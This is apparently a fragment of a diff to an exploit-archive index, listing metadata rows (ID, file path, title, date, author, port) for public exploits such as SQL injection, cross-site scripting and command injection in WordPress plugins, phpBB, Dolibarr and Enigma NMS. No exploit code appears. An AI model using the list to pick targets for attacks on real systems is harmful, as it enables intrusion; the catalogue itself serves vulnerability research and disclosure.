 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41709,11 +41713,14 @@ id,file,description,date,author,type,platform,port
 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
 47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
-47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,
+47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
 47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple,
 47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple,
-47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,
-47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,
+47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,80
+47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80
 47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi,
-47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,
-47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,
+47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr 
Winst0n",webapps,php,80
+47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
+47371,exploits/php/webapps/47371.txt,"WordPress Plugin Photo Gallery 1.5.34 - SQL Injection",2019-09-10,MTK,webapps,php,80
+47372,exploits/php/webapps/47372.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting",2019-09-10,MTK,webapps,php,80
+47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80